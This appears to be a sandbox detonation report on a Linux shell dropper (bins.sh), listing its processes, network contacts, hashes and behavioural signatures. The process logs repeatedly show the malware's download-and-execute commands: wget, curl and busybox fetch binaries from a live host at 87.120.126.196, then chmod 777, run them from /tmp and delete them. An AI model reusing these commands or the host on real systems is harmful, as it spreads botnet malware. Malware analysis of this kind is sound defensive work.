[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/chmod
[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/rm
[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/wget
[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/chmod
[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/rm
[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/chmod
[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/rm
[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:28
Reported
2024-10-21 01:30
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
17s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
Processes
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
